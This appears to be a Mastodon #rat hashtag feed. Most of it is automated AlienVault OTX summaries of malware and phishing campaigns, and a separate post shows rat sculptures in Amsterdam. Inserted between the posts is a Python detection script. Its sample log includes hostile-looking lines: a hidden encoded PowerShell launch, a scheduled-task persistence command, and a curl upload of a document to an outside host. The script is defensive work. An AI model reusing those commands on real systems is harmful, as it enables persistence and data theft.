dmv.community is one of the many independent Mastodon servers you can use to participate in the fediverse.
A small regional Mastodon instance for those in the DC, Maryland, and Virginia areas. Local news, commentary, and conversation.

#rat

42 posts, 15 participants, 2 posts today

Hunters International Shifts from Ransomware to Pure Data Extortion

Hunters International, a sophisticated ransomware operation with suggested connections to the dismantled Hive ransomware group, has shifted from ransomware to pure data extortion.

Pulse ID: 67f021613504c9bdb4a2c9f2
Pulse Link: otx.alienvault.com/pulse/67f02
Pulse Author: cryptocti
Created: 2025-04-04 18:13:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue - Open Threat Exchange: Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

Silent Credit Card Thief Uncovered

A sophisticated credit card skimming campaign dubbed 'RolandSkimmer' has been discovered, targeting users in Bulgaria. The attack utilizes malicious browser extensions across Chrome, Edge, and Firefox, initiated through a deceptive LNK file. The malware employs obfuscated scripts to establish persistent access, harvesting and exfiltrating sensitive financial data. The attack workflow involves system reconnaissance, downloading additional malicious files, and injecting scripts into web pages. The threat actor uses unique identifiers to track victims and employs sophisticated techniques to evade detection. The campaign demonstrates the evolving nature of web-based credit card skimming threats, highlighting the need for enhanced security measures against LNK-based attacks and unverified browser extensions.

Pulse ID: 67efc6e92fbd533808f09435
Pulse Link: otx.alienvault.com/pulse/67efc
Pulse Author: AlienVault
Created: 2025-04-04 11:47:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Where to Find Aspiring Hackers

This analysis delves into Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as 'Coquettte' and their ties to the Horrid hacking group, a loosely organized cybercriminal collective. The investigation reveals a fake cybersecurity website, cybersecureprotect[.]com, which exposed its malicious infrastructure due to an OPSEC failure. Coquettte's activities include distributing malware, keyloggers, and trojans through Proton66's infrastructure. The research also uncovers other projects operated by this actor, including a website hosting guides for illegal activities. The analysis provides technical details of Coquettte's malware infrastructure and explores Proton66's role as a breeding ground for amateur threat actors.

Pulse ID: 67efe859080e7d3823c1d41e
Pulse Link: otx.alienvault.com/pulse/67efe
Pulse Author: AlienVault
Created: 2025-04-04 14:10:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

APT Targets South Korea with Deceptive PDF Lures

The Kimsuky APT group, also known as Black Banshee, has been actively targeting South Korean government entities using evolving tactics. Two distinct campaigns were uncovered, both utilizing government-themed PDF documents as lures. The infection chain begins with a phishing email containing a malicious LNK file attachment, which drops an obfuscated VBA script. This script then deploys additional files, including a PDF and a ZIP containing malicious components. The attacks involve sophisticated techniques such as Base64 encoding, obfuscation, and VM-aware evasion. The malware's functionalities include data exfiltration, cryptocurrency wallet theft, browser data extraction, keylogging, and establishing C2 communication. The campaigns demonstrate the group's continuous efforts to compromise South Korean targets using deceptive tactics and multi-stage malware.

Pulse ID: 67efe85af4503af2018d414e
Pulse Link: otx.alienvault.com/pulse/67efe
Pulse Author: AlienVault
Created: 2025-04-04 14:10:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

PoisonSeed Campaign Targets CRM and Bulk Email Providers in Supply Chain Spam Operation

The PoisonSeed campaign is targeting enterprise organizations and individuals outside the cryptocurrency industry by phishing CRM and bulk email provider credentials. The attackers export email lists and send bulk spam from compromised accounts, primarily to support cryptocurrency spam operations. The campaign uses a novel cryptocurrency seed phrase poisoning attack, providing security seed phrases to trick victims into copying them into new cryptocurrency wallets for future compromise. While similarities exist with Scattered Spider and CryptoChameleon groups, PoisonSeed is currently classified separately due to unique characteristics. The campaign has targeted companies like Coinbase, Ledger, Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho, using sophisticated phishing techniques and automated processes to quickly exploit compromised accounts.

Pulse ID: 67ef8546d1d9ef9cd8e91906
Pulse Link: otx.alienvault.com/pulse/67ef8
Pulse Author: AlienVault
Created: 2025-04-04 07:07:50

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Stripe API Skimming Campaign: Additional Victims & Insights

A sophisticated web skimming campaign has been discovered, utilizing a legacy Stripe API to validate stolen payment details before exfiltration. The attack involves multiple stages, including malicious loader injection, decoding, and skimming. Jscrambler's research team identified 49 affected merchants and uncovered additional domains potentially involved in the campaign. The skimmers are tailored for each targeted site and exploit vulnerabilities in e-commerce platforms. The attackers employ minimal obfuscation and transmit stolen data without encryption. The campaign has been active since August 2024, primarily targeting WooCommerce and WordPress sites. To protect against such attacks, merchants are advised to implement real-time webpage monitoring and adopt hardened iframe implementations.

Pulse ID: 67ef0694c316fa098bbc9279
Pulse Link: otx.alienvault.com/pulse/67ef0
Pulse Author: AlienVault
Created: 2025-04-03 22:07:16

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Gootloader Returns: Malware Hidden in Google Ads for Legal Documents

The Gootloader malware campaign has evolved its tactics, now using Google Ads to target victims seeking legal templates. The threat actor advertises legal documents, primarily agreements, through compromised ad accounts. Users searching for templates are directed to a malicious website where they are prompted to enter their email address. They then receive an email with a link to download a seemingly legitimate document, which is actually a zipped .JS file containing malware. When executed, the malware creates a scheduled task and uses PowerShell to communicate with compromised WordPress blogs. The campaign demonstrates a shift in Gootloader's strategy, moving from poisoned search results to controlled infrastructure for malware delivery.

Pulse ID: 67ef0696f2790ccbd23c46a9
Pulse Link: otx.alienvault.com/pulse/67ef0
Pulse Author: AlienVault
Created: 2025-04-03 22:07:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Threat Actor Deploys Ransomware Through Fake Zoom Download

A threat actor group leveraged a malicious Zoom file to infiltrate corporate environments. This was observed after the group silently targeted a corporate environment for nine days before deploying the dangerous BlackSuit ransomware.

Pulse ID: 67ef2c7984e7a6c5db88a1d0
Pulse Link: otx.alienvault.com/pulse/67ef2
Pulse Author: cryptocti
Created: 2025-04-04 00:48:56

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

New Crocodilus Malware Targets Android Devices

A new mobile banking app has been identified as a trojan named “Crocodilus”. Investigation shows that this malware employs new, sophisticated features, including overlay attacks, accessibility-based data harvesting, remote access trojan (RAT) functionality and obfuscated remote-control mechanisms.

Pulse ID: 67ef2e498e6c86a6cd2ffe2c
Pulse Link: otx.alienvault.com/pulse/67ef2
Pulse Author: cryptocti
Created: 2025-04-04 00:56:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Hackers Use WRECKSTEEL to Steal Information from Computers

Ukrainian government agencies are facing targeted cyberattacks carried out by a threat actor named UAC-0219 using the information stealer WRECKSTEEL.

Pulse ID: 67ef237e2f35b330c2ab021c
Pulse Link: otx.alienvault.com/pulse/67ef2
Pulse Author: cryptocti
Created: 2025-04-04 00:10:38

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Thunderstruck! Malicious ads for RVTools lead to ThunderShell payload

A security incident involving malicious sponsored ads distributing backdoored administrative tools was detected. Users searching for RVTools were served a tampered version containing ThunderShell, a PowerShell-based remote access tool. The malicious ads, appearing in Google search results, led to a site mimicking the legitimate RVTools download page. The trojanized file, when executed, installs RVTools but also deploys ThunderShell, allowing attackers to execute commands on compromised machines. Multiple ads from different verified advertisers were used to evade security controls. The campaign highlights the persistent threat of malvertising and the need for stronger ad screening processes and user awareness.

Pulse ID: 67eec2ff4d0da82ea2ee1e26
Pulse Link: otx.alienvault.com/pulse/67eec
Pulse Author: AlienVault
Created: 2025-04-03 17:18:55

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Threat actors leverage tax season to deploy tax-themed phishing campaigns

Microsoft has observed several phishing campaigns using tax-related themes to steal credentials and deploy malware as Tax Day approaches in the United States. These campaigns use redirection methods like URL shorteners and QR codes in malicious attachments, and abuse legitimate services to avoid detection. They lead to phishing pages delivered via RaccoonO365 platform, remote access trojans like Remcos, and other malware such as Latrodectus, BruteRatel C4, AHKBot, and GuLoader. The campaigns target various sectors including engineering, IT, consulting, and accounting firms. Threat actors use social engineering techniques to mislead taxpayers into revealing sensitive information, making payments to fake services, or installing malicious payloads. Microsoft provides detailed mitigation and protection guidance to help users and organizations defend against these tax-centric threats.

Pulse ID: 67eec31b26a9b5d94190be7d
Pulse Link: otx.alienvault.com/pulse/67eec
Pulse Author: AlienVault
Created: 2025-04-03 17:19:23

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Cyber Espionage using PowerShell stealer WRECKSTEEL

Ukrainian government's CERT-UA has identified a series of cyberattacks against government agencies and critical infrastructure facilities in Ukraine during March 2025. The attacks, aimed at information theft, utilize compromised accounts to distribute emails with links to public file services. These links download a VBScript loader, which then launches a PowerShell script to search and upload specific file types using cURL. The malicious activity, tracked as UAC-0219, has been ongoing since fall 2024. The primary tool, classified as WRECKSTEEL, exists in both VBScript and PowerShell versions. Earlier attacks in 2024 used EXE files created with NSIS installers, containing decoy documents and the IrfanView program for screenshots. CERT-UA urges immediate reporting of any detected cyberattack signs.

Pulse ID: 67eed31e2e5388397fc6bf7e
Pulse Link: otx.alienvault.com/pulse/67eed
Pulse Author: AlienVault
Created: 2025-04-03 18:27:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.
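
The Gootloader post above (a zipped .JS file that creates a scheduled task and uses PowerShell) and the CERT-UA WRECKSTEEL post above (a VBScript loader that launches a PowerShell script which uploads files with cURL) both describe the same shape of process chain: a Windows script host runs a downloaded script, that script spawns powershell.exe, and PowerShell spawns the follow-on process. The Python below is an added example, not code from any of the posts, from CERT-UA or from the researchers behind them; it looks for that three-process chain in process-creation records. The record layout, the process names chosen for each stage and the sample log lines are all constructed for illustration and are assumptions, not any vendor's real log format.

```python
import re

# Assumed process names at each stage of the chain the two posts describe.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # runs the downloaded .js / .vbs loader
SCRIPT_FILE_RE = re.compile(r'[^\s"]+\.(?:js|jse|vbs|vbe)\b', re.IGNORECASE)
FOLLOW_ON = {  # processes worth flagging when their parent is powershell.exe
    "schtasks.exe": "scheduled-task persistence (as in the Gootloader post)",
    "curl.exe": "file upload with cURL (as in the WRECKSTEEL post)",
}

# Assumed, simplified process-creation record layout (constructed, not a real format):
#   <timestamp> pid=<n> ppid=<n> image=<path> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>[^"]*)"$'
)

# Constructed sample records: one Gootloader-like chain, one WRECKSTEEL-like
# chain, and one benign admin chain (cmd.exe -> powershell -> schtasks /query).
SAMPLE_LOG = [
    r'2025-04-03T10:00:01Z pid=4100 ppid=900 image=C:\Windows\explorer.exe cmd="explorer.exe"',
    r'2025-04-03T10:00:05Z pid=4212 ppid=4100 image=C:\Windows\System32\wscript.exe cmd="wscript.exe C:\Users\a\Downloads\agreement.js"',
    r'2025-04-03T10:00:06Z pid=4300 ppid=4212 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -w hidden -enc AAAA"',
    r'2025-04-03T10:00:07Z pid=4310 ppid=4300 image=C:\Windows\System32\schtasks.exe cmd="schtasks.exe /create /tn Updater /sc minute /mo 10 /tr powershell.exe"',
    r'2025-04-03T10:05:00Z pid=5000 ppid=4100 image=C:\Windows\System32\wscript.exe cmd="wscript.exe C:\Users\a\Downloads\invoice.vbs"',
    r'2025-04-03T10:05:01Z pid=5010 ppid=5000 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -nop -c collect"',
    r'2025-04-03T10:05:02Z pid=5020 ppid=5010 image=C:\Windows\System32\curl.exe cmd="curl.exe -F file=@C:\Users\a\Documents\plan.docx https://files.example/upload"',
    r'2025-04-03T11:00:00Z pid=6000 ppid=4100 image=C:\Windows\System32\cmd.exe cmd="cmd.exe"',
    r'2025-04-03T11:00:01Z pid=6010 ppid=6000 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe"',
    r'2025-04-03T11:00:02Z pid=6020 ppid=6010 image=C:\Windows\System32\schtasks.exe cmd="schtasks.exe /query"',
]


def parse_line(line):
    """Return a dict for one record, or None if the line does not match the layout."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["ppid"] = int(rec["ppid"])
    rec["name"] = rec["image"].rsplit("\\", 1)[-1].lower()  # basename of the image path
    return rec


def find_chains(lines):
    """
    Return one (script_file, follow_on_process, reason) tuple for every
    script-host -> powershell.exe -> {schtasks.exe, curl.exe} chain in `lines`.
    Walks child -> parent -> grandparent by pid/ppid, so a benign chain such as
    cmd.exe -> powershell.exe -> schtasks.exe is not reported.
    """
    procs = {}
    for line in lines:
        rec = parse_line(line)
        if rec:
            procs[rec["pid"]] = rec

    hits = []
    for child in procs.values():
        reason = FOLLOW_ON.get(child["name"])
        if reason is None:
            continue
        parent = procs.get(child["ppid"])
        if parent is None or parent["name"] != "powershell.exe":
            continue
        grandparent = procs.get(parent["ppid"])
        if grandparent is None or grandparent["name"] not in SCRIPT_HOSTS:
            continue
        script = SCRIPT_FILE_RE.search(grandparent["cmd"])
        if script is None:
            continue  # script host ran without a .js/.vbs argument; not this pattern
        hits.append((script.group(0).rsplit("\\", 1)[-1], child["name"], reason))
    return hits


if __name__ == "__main__":
    for script_file, proc, reason in find_chains(SAMPLE_LOG):
        print(f"{script_file} -> powershell.exe -> {proc}: {reason}")
```

Run stand-alone, the script reports the two malicious chains and stays silent on the admin's cmd.exe-launched PowerShell; the same grandparent check is what keeps this from paging on every `schtasks` run by a legitimate automation script.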

TookPS distributed under the guise of UltraViewer, AutoCAD, and Ableton

A malware campaign is distributing the TookPS downloader by impersonating popular software like UltraViewer, AutoCAD, SketchUp, Ableton, and Quicken. The malware establishes an SSH tunnel for remote access and deploys additional payloads like TeviRat and Lapmon backdoors. The attackers gain full system control through various methods. The campaign targets both individuals and organizations, using domains registered in early 2024. Users are advised to avoid downloading pirated software, while organizations should implement strict security policies and conduct regular awareness training.

Pulse ID: 67eea35a7cea57b67d9c3172
Pulse Link: otx.alienvault.com/pulse/67eea
Pulse Author: AlienVault
Created: 2025-04-03 15:03:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

Amateur Hacker Leverages Bulletproof Hosting Server to Spread Malware

A novice cybercriminal, known as 'Coquettte', has been discovered using a Russian bulletproof hosting provider, Proton66, to distribute malware. The hacker's activities include deploying the Rugmi malware loader through a fake cybersecurity product website and selling guides for illegal substances and weapons. Coquettte is believed to be part of a loosely structured hacking collective called Horrid. The threat actor's infrastructure spans multiple domains and platforms, including GitHub, YouTube, and Last.fm. This network appears to serve as an incubator for aspiring cybercriminals, offering malware resources, hosting solutions, and a collaborative environment for underground hacking activities.

Pulse ID: 67eec2fef6857d8d79dbb7e6
Pulse Link: otx.alienvault.com/pulse/67eec
Pulse Author: AlienVault
Created: 2025-04-03 17:18:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

In the backyard of the “Amsterdam Museum” (formerly known as “Hermitage”) you can find some ‘metal beasts’, made by artist “Junk-Art”. 🐀 ⚙️⛓️

The sculptures are handmade and sustainable, and the material used is steel, including sources such as bolts, gears, all sorts of motor parts, horseshoes and metal scraps. ♻️

#Amsterdam #metalbeast #rat #metal #junkart #neerlandiaplein #exhibition #photo #urbanart #mokum #noir #xxx #art #scrap #gears #bnw #photography #concretejungle #scrapmetal #parts #industrial #animal #artiseverywhere #streetphotography #steel #bolts #beeld #rodent #museum #museo #arte #artwork #motorparts #blackandwhite #horseshoes #recycling #recycle #rusty #escultura #sculpture #rust